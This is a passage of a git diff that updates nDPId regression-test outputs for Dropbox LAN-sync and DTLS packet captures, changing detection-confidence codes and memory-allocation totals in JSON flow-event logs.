00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEd25AAEARAQ3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADETEZAAEARaY3AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1535391651168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391651168,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jlBAAEAR6fXAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1535391651170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391651170,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SNZAAEARbMjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1535391652506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391652506,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jm9AAEAR6dbAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1535391652507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391652507,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SaBAAEARa\/7AqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1535391682513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391682513,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/nwpAAEAR2TvAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1535391682514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391682514,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/ZDZAAEARUWjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":848,"packets-processed":848,"total-skipped-flows":0,"total-l4-payload-len":54916,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":6,"total-updates":2,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":103,"global_ts_msec":1535391682514} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 848/848 @@ -109,9 +109,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908707 bytes -~~ total memory freed........: 5908707 bytes -~~ total allocations/frees...: 119012/119012 +~~ total memory allocated....: 6042341 bytes +~~ total memory freed........: 6042341 bytes +~~ total allocations/frees...: 121774/121774 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 830 chars diff --git a/test/results/dtls.pcap.out b/test/results/dtls.pcap.out index ba46f0237..51704c9fb 100644 --- a/test/results/dtls.pcap.out +++ b/test/results/dtls.pcap.out @@ -2,7 +2,7 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1545143424891} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1545143424891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1545143424891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":310,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1545143424891} @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869509 bytes -~~ total memory freed........: 5869509 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6003143 bytes +~~ total memory freed........: 6003143 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1053 chars diff --git a/test/results/dtls2.pcap.out b/test/results/dtls2.pcap.out index 91d1f9611..c0c734e28 100644 --- a/test/results/dtls2.pcap.out +++ b/test/results/dtls2.pcap.out @@ -2,12 +2,12 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1507911659748} 